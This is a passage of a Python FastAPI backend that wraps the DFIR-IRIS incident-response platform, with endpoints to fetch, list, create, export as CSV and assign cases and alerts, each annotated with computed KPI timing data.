  2212. summary="Get single IRIS case with KPI",
  2213. description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.",
  2214. )
  2215. async def iris_get_case(case_id: int) -> ApiResponse:
  2216. try:
  2217. raw = await iris_adapter.get_case(case_id)
  2218. except Exception as exc:
  2219. raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc
  2220. wrapper = {"data": [raw]}
  2221. enriched = _enrich_cases_with_kpi(wrapper)
  2222. case_out = enriched["data"][0] if enriched.get("data") else raw
  2223. return ApiResponse(data={"case": case_out})
  2224. @app.get(
  2225. "/iris/cases",
  2226. response_model=ApiResponse,
  2227. summary="List IRIS cases with KPI",
  2228. description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.",
  2229. )
  2230. async def iris_list_cases(
  2231. page: int = 1,
  2232. per_page: int = 20,
  2233. sort_by: str = "case_id",
  2234. sort_dir: str = "desc",
  2235. filter_name: str | None = None,
  2236. ) -> ApiResponse:
  2237. # adapter maps (limit, offset) → (per_page, page) for IRIS v2
  2238. offset = (page - 1) * per_page
  2239. try:
  2240. raw = await iris_adapter.list_cases(limit=per_page, offset=offset)
  2241. except Exception as exc:
  2242. raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc
  2243. enriched = _enrich_cases_with_kpi(raw)
  2244. items = enriched.get("data") or enriched.get("items", [])
  2245. total = enriched.get("total", len(items))
  2246. last_page = enriched.get("last_page", max(1, -(-total // per_page)))
  2247. if filter_name:
  2248. items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()]
  2249. reverse = sort_dir == "desc"
  2250. items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse)
  2251. return ApiResponse(data={"cases": {
  2252. "data": items,
  2253. "total": total,
  2254. "current_page": page,
  2255. "last_page": last_page,
  2256. }})
  2257. @app.post(
  2258. "/iris/alerts",
  2259. response_model=ApiResponse,
  2260. summary="Create IRIS alert",
  2261. description="Create a new alert in DFIR-IRIS via /api/v2/alerts.",
  2262. )
  2263. async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse:
  2264. alert_payload: dict[str, Any] = {
  2265. "alert_title": payload.title,
  2266. "alert_description": payload.description,
  2267. "alert_severity_id": payload.severity_id,
  2268. "alert_status_id": payload.status_id,
  2269. "alert_source": payload.source,
  2270. "alert_customer_id": payload.customer_id or settings.iris_default_customer_id,
  2271. "alert_source_event_time": datetime.now(timezone.utc).isoformat(),
  2272. }
  2273. if payload.source_ref:
  2274. alert_payload["alert_source_ref"] = payload.source_ref
  2275. if payload.payload:
  2276. alert_payload.update(payload.payload)
  2277. try:
  2278. result = await iris_adapter.create_alert(alert_payload)
  2279. except Exception as exc:
  2280. raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc
  2281. return ApiResponse(data={"alert": result})
  2282. @app.get(
  2283. "/iris/alerts",
  2284. response_model=ApiResponse,
  2285. summary="List IRIS alerts with KPI Timeout",
  2286. description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.",
  2287. )
  2288. async def iris_list_alerts(
  2289. page: int = 1,
  2290. per_page: int = 20,
  2291. sort_by: str = "alert_id",
  2292. sort_dir: str = "desc",
  2293. filter_title: str | None = None,
  2294. filter_owner_id: int | None = None,
  2295. ) -> ApiResponse:
  2296. try:
  2297. raw = await iris_adapter.list_alerts(
  2298. page=page,
  2299. per_page=per_page,
  2300. sort_by=sort_by,
  2301. sort_dir=sort_dir,
  2302. filter_title=filter_title,
  2303. filter_owner_id=filter_owner_id,
  2304. )
  2305. enriched = _enrich_alerts_with_kpi(raw)
  2306. return ApiResponse(data={
  2307. "alerts": {
  2308. "data": enriched.get("data", []),
  2309. "total": enriched.get("total", 0),
  2310. "current_page": enriched.get("current_page", page),
  2311. "last_page": enriched.get("last_page", 1),
  2312. }
  2313. })
  2314. except Exception as exc:
  2315. raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc
  2316. @app.get(
  2317. "/iris/alerts/export-csv",
  2318. summary="Export IRIS alerts as CSV",
  2319. description="Download all matching alerts (up to 1000) as a CSV attachment.",
  2320. )
  2321. async def iris_export_alerts_csv(
  2322. sort_by: str = "alert_id",
  2323. sort_dir: str = "desc",
  2324. filter_title: str | None = None,
  2325. filter_owner_id: int | None = None,
  2326. ) -> StreamingResponse:
  2327. try:
  2328. raw = await iris_adapter.list_alerts(
  2329. page=1,
  2330. per_page=1000,
  2331. sort_by=sort_by,
  2332. sort_dir=sort_dir,
  2333. filter_title=filter_title,
  2334. filter_owner_id=filter_owner_id,
  2335. )
  2336. except Exception as exc:
  2337. raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc
  2338. enriched = _enrich_alerts_with_kpi(raw)
  2339. alerts = enriched.get("data", [])
  2340. output = io.StringIO()
  2341. fieldnames = [
  2342. "alert_id", "alert_title", "alert_severity", "alert_status",
  2343. "alert_creation_time", "alert_source_event_time", "alert_owner",
  2344. "kpi_pct", "kpi_status",
  2345. ]
  2346. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2347. writer.writeheader()
  2348. for alert in alerts:
  2349. kpi = alert.get("kpi", {})
  2350. severity_name = (alert.get("severity") or {}).get("severity_name", "")
  2351. writer.writerow({
  2352. "alert_id": alert.get("alert_id", ""),
  2353. "alert_title": alert.get("alert_title", ""),
  2354. "alert_severity": severity_name,
  2355. "alert_status": (alert.get("status") or {}).get("status_name", ""),
  2356. "alert_creation_time": alert.get("alert_creation_time", ""),
  2357. "alert_source_event_time": alert.get("alert_source_event_time", ""),
  2358. "alert_owner": (alert.get("owner") or {}).get("user_name", ""),
  2359. "kpi_pct": kpi.get("kpi_pct", ""),
  2360. "kpi_status": kpi.get("status", ""),
  2361. })
  2362. output.seek(0)
  2363. return StreamingResponse(
  2364. iter([output.getvalue()]),
  2365. media_type="text/csv",
  2366. headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"},
  2367. )
  2368. @app.get(
  2369. "/iris/alerts/{alert_id}",
  2370. response_model=ApiResponse,
  2371. summary="Get single IRIS alert with KPI",
  2372. description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.",
  2373. )
  2374. async def iris_get_alert(alert_id: int) -> ApiResponse:
  2375. try:
  2376. raw = await iris_adapter.get_alert(alert_id)
  2377. except Exception as exc:
  2378. raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc
  2379. # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it
  2380. alert = raw if isinstance(raw, dict) else {}
  2381. wrapper = {"data": [alert]}
  2382. enriched = _enrich_alerts_with_kpi(wrapper)
  2383. alert_out = enriched["data"][0] if enriched.get("data") else alert
  2384. return ApiResponse(data={"alert": alert_out})
  2385. @app.post(
  2386. "/iris/alerts/{alert_id}/assign",
  2387. response_model=ApiResponse,
  2388. summary="Assign IRIS alert to owner",
  2389. description="Update the owner of a DFIR-IRIS alert.",
  2390. )
  2391. async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse:
  2392. owner_id = body.get("owner_id")
  2393. if not isinstance(owner_id, int):
  2394. raise HTTPException(status_code=422, detail="owner_id must be an integer")
  2395. try:
  2396. result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id)
  2397. return ApiResponse(data=result)
  2398. except Exception as exc:
  2399. raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc